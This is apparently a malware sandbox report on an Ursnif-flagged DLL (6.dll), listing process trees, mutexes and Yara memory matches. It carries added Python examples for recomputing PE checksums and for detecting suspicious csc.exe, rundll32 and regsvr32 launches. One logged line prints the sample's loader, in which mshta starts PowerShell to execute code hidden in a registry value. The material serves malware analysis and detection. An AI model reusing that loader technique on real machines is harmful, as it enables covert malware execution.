            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline
            Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name fubjsv -value gp; new-alias -name xkkiatugq -value iex; xkkiatugq ([System.Text.Encoding]::ASCII.GetString((fubjsv "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: unknown unknown
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES451.tmp" "c:\Users\user\AppData\Local\Temp\nigogz4l\CSCB0FB5A4205944E4B1A4F1A7502114E8.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES11BF.tmp" "c:\Users\user\AppData\Local\Temp\nlbomp32\CSCD36E4F5AB95F41AC9563905B5139F56.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES148E.tmp" "c:\Users\user\AppData\Local\Temp\wklr4juq\CSC206B99537D694137B0FEEBD968CAD59B.TMP"
            Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B16.tmp" "c:\Users\user\AppData\Local\Temp\uu5u2nmv\CSC63445C49B154491498BDD3FB79A78AC.TMP"
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: unknown unknown
            Source: C:\Windows\System32\control.exe | Process created: unknown unknown
            Source: C:\Windows\System32\control.exe | Process created: unknown unknown
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20211214\PowerShell_transcript.841675.g3ZPtttJ.20211214103418.txt
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ybuxanvq.4gq.ps1
            Source: classification engineClassification label: mal100.troj.evad.winDLL@59/52@16/4
            Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F13309 CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
            Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{542DFF7D-A3B8-A645-CDC8-873A517CAB0E}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{B0E37361-4FA3-62B8-59E4-F3B69D58D74A}
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4196:120:WilError_01
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
            Source: C:\Windows\SysWOW64\regsvr32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{B864CE7C-B760-AAC6-016C-DB7EC5603F92}
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7048:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{80FA9EC6-DFAB-B287-69B4-8306AD28679A}
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_01
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{6824B7BA-A73C-DA91-711C-CBAE35102FC2}
            Source: C:\Windows\SysWOW64\rundll32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{8CBE6080-7B68-9E43-6580-DFB269B48306}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: \Sessions\1\BaseNamedObjects\{EC2366C9-5BCE-FEAF-45E0-BF1249146366}
            Source: C:\Windows\System32\loaddll32.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 entries)
            Source: C:\Windows\SysWOW64\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 entries)
            Source: C:\Windows\SysWOW64\rundll32.exe | File read: C:\Windows\System32\drivers\etc\hosts (4 entries)
            Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: 6.dll | Static file information: File size 1781920 > 1048576
            Source: 6.dll | Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x16fa00
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.452232416.0000000004AA0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.431445543.0000000006530000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.427791226.0000000005CD0000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.437889471.0000000006160000.00000004.00000001.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\dhqbspln\dhqbspln.pdb561934e089 source: powershell.exe, 00000019.00000003.455310412.00000254DC7BD000.00000004.00000001.sdmp
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F1B073 push ecx; ret
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F1E97E pushad ; iretd
            Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F1AD40 push ecx; ret
            Source: 6.dll | Static PE information: real checksum: 0x1ba6ec should be: 0x1b8278
            Source: nigogz4l.dll.33.dr | Static PE information: real checksum: 0x0 should be: 0xee8b
            Source: dtnsoflb.dll.43.dr | Static PE information: real checksum: 0x0 should be: 0x4b02
            Source: nlbomp32.dll.35.dr | Static PE information: real checksum: 0x0 should be: 0xf45d
            Source: uu5u2nmv.dll.40.dr | Static PE information: real checksum: 0x0 should be: 0xa363
            Source: wklr4juq.dll.36.dr | Static PE information: real checksum: 0x0 should be: 0x1029d
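The six checksum lines above contrast the value stored in OptionalHeader.CheckSum ("real checksum") with the value recomputed over the file ("should be"). Two different situations are mixed in that list: 6.dll carries a non-zero checksum that no longer matches its bytes, which is what a file modified after linking (packed, patched, appended to) looks like, while the five assemblies csc.exe produced carry 0x0, meaning the field was simply never populated. Windows only enforces the checksum for drivers, boot-time DLLs and DLLs loaded into certain critical processes, so a bad value does not stop a user-mode DLL from loading, but it is a cheap static triage signal. The following Python is an added example, not part of the Joe Sandbox report, that recomputes the checksum with the same algorithm as CheckSumMappedFile (dword sum with end-around carry, folded to 16 bits, plus file length, with the CheckSum field itself excluded) and classifies a file the way the report does; the minimal PE32 image it builds is constructed here purely as demo input and is not loadable.

```python
import struct
import sys


def _checksum_field_offset(data) -> int:
    """File offset of OptionalHeader.CheckSum, after validating the MZ/PE headers."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt = e_lfanew + 4 + 20                      # 4-byte signature + 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic not in (0x10B, 0x20B):              # PE32 or PE32+
        raise ValueError("unexpected optional-header magic 0x%x" % magic)
    return opt + 64                              # CheckSum sits at +64 in both layouts


def pe_checksum(data: bytes) -> int:
    """Recompute the image checksum the same way CheckSumMappedFile does."""
    buf = bytearray(data)
    off = _checksum_field_offset(buf)
    buf[off:off + 4] = b"\0\0\0\0"               # the field itself is excluded from the sum
    buf += b"\0" * (-len(buf) % 4)               # pad to whole dwords
    total = 0
    for (dword,) in struct.iter_unpack("<I", buf):
        total += dword
        if total > 0xFFFFFFFF:                   # end-around carry
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)     # fold 32 bits down to 16
    total += total >> 16
    total &= 0xFFFF
    return (total + len(data)) & 0xFFFFFFFF     # original, unpadded length is added last


def stored_checksum(data: bytes) -> int:
    """Value currently present in the CheckSum field."""
    return struct.unpack_from("<I", data, _checksum_field_offset(data))[0]


def set_checksum(data: bytes, value: int) -> bytes:
    """Copy of the file with the CheckSum field overwritten."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, _checksum_field_offset(buf), value)
    return bytes(buf)


def classify(data: bytes):
    """('unset' | 'ok' | 'mismatch', stored, computed), in the report's 'real ... should be' terms."""
    stored, computed = stored_checksum(data), pe_checksum(data)
    verdict = "unset" if stored == 0 else ("ok" if stored == computed else "mismatch")
    return verdict, stored, computed


def build_minimal_pe(checksum: int = 0) -> bytes:
    """Constructed 232-byte PE32 DLL skeleton (headers only, not loadable) used as demo input."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)        # e_lfanew: PE header directly after the DOS header
    # i386, 1 section, no symbols, 96-byte optional header, DLL | 32-bit | executable image
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 96, 0x2102)
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 64, checksum)    # CheckSum field
    section = bytearray(40)
    section[0:5] = b".text"
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(section) + bytes(8)


if __name__ == "__main__":
    targets = [("constructed minimal PE", build_minimal_pe())]
    targets += [(p, open(p, "rb").read()) for p in sys.argv[1:]]
    for name, blob in targets:
        verdict, stored, computed = classify(blob)
        print(f"{name}: {verdict} (stored 0x{stored:x}, computed 0x{computed:x})")
```

Run it with one or more file paths to get the same three-way verdict for real samples. Because the field is zeroed before summing, writing the computed value back and recomputing yields the same number, which is how a linker (or an attacker repairing a patched binary) makes the check pass; treat "unset" as a weaker signal than "mismatch", since many managed assemblies ship with a zero checksum, as the five csc.exe outputs in the report do.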
            Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.cmdline"
            (each of the five csc.exe invocations is listed twice in the report)
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\uu5u2nmv\uu5u2nmv.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\dtnsoflb\dtnsoflb.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\wklr4juq\wklr4juq.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\nlbomp32\nlbomp32.dll

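The process-creation entries above show three parent/child plus command-line patterns a detection engineer would turn into rules: powershell.exe launching csc.exe with /noconfig /fullpaths and a .cmdline response file in a random directory under %TEMP% (the on-disk trace of an Add-Type compile), cmd.exe launching rundll32.exe with an export ordinal (",#1") instead of an export name, and regsvr32.exe /s registering a DLL that sits on the user's Desktop. The following Python is an added example, not part of the Joe Sandbox report, that applies those three checks to constructed process-creation records modelled on the lines above; the field names (Image, ParentImage, CommandLine), the rule names, and the benign look-alike records are all my own choices, and the set of "user-writable" folders in the regsvr32 check is an assumption rather than anything the report states.

```python
import re
from typing import Dict, List, Tuple

# Response file PowerShell's Add-Type writes before running csc.exe: a random
# directory under %TEMP% containing a .cmdline file with the same base name.
ADD_TYPE_CMDLINE = re.compile(
    r'@"?[A-Za-z]:\\Users\\[^\\]+\\AppData\\Local\\Temp\\([a-z0-9_]+)\\\1\.cmdline"?',
    re.IGNORECASE,
)
# rundll32 invoked with an export ordinal ("...\x.dll",#1) rather than a name.
ORDINAL_EXPORT = re.compile(r'\.dll"?\s*,\s*#\d+', re.IGNORECASE)
# DLL path under a user-writable profile folder (assumption: Desktop, Downloads, AppData).
USER_WRITABLE_DLL = re.compile(
    r'\\Users\\[^\\]+\\(Desktop|Downloads|AppData)\\[^"]*\.dll', re.IGNORECASE
)

Event = Dict[str, str]


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_event(ev: Event) -> List[str]:
    """Names of every rule this process-creation record matches (empty if none)."""
    image = _basename(ev.get("Image", ""))
    parent = _basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    hits: List[str] = []
    if image == "csc.exe" and parent == "powershell.exe" and ADD_TYPE_CMDLINE.search(cmd):
        hits.append("csc_compile_from_temp_via_powershell")
    if image == "rundll32.exe" and ORDINAL_EXPORT.search(cmd):
        hits.append("rundll32_ordinal_export")
    if image == "regsvr32.exe" and USER_WRITABLE_DLL.search(cmd):
        hits.append("regsvr32_user_writable_dll")
    return hits


def scan(events: List[Event]) -> List[Tuple[int, List[str]]]:
    """(index, rule hits) for every record that matched at least one rule."""
    results = []
    for i, ev in enumerate(events):
        hits = classify_event(ev)
        if hits:
            results.append((i, hits))
    return results


# Constructed records: the first three mirror the report's command lines, the
# last three are benign look-alikes that the rules must not flag.
EVENTS: List[Event] = [
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
                    r'@"C:\Users\user\AppData\Local\Temp\nigogz4l\nigogz4l.cmdline"'},
    {"ParentImage": r"C:\Windows\SysWOW64\cmd.exe",
     "Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r'rundll32.exe "C:\Users\user\Desktop\6.dll",#1'},
    {"ParentImage": r"C:\Windows\System32\loaddll32.exe",
     "Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\user\Desktop\6.dll"},
    {"ParentImage": r"C:\Program Files\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "CommandLine": r'csc.exe /noconfig /fullpaths @"C:\src\app\obj\Debug\csc.rsp"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"ParentImage": r"C:\Windows\System32\msiexec.exe",
     "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\vendor.dll"'},
]

if __name__ == "__main__":
    for index, hits in scan(EVENTS):
        print(index, EVENTS[index]["CommandLine"], "->", ", ".join(hits))
```

The csc.exe rule keys on the parent being PowerShell and on the directory and file stem being identical, which is how the Add-Type response file is named; a build tool compiling from a source tree does not match even though it also passes /noconfig. The ordinal rule matches only the ",#N" form, so named exports such as Control_RunDLL pass, and the regsvr32 rule looks at the DLL location rather than the parent, because in the sandbox the parent (loaddll32.exe) is the analysis harness and carries no signal.
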
            Hooking and other Techniques for Hiding and Protection:

            Yara detected Ursnif
            Source: Yara match | File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR
            Source: C:\Windows\System32\loaddll32.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\System32\loaddll32.exe | Process information set: NOOPENFILEERRORBOX (2 entries)
            Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX (2 entries)
            Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX (10 entries)
            Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX (3 entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
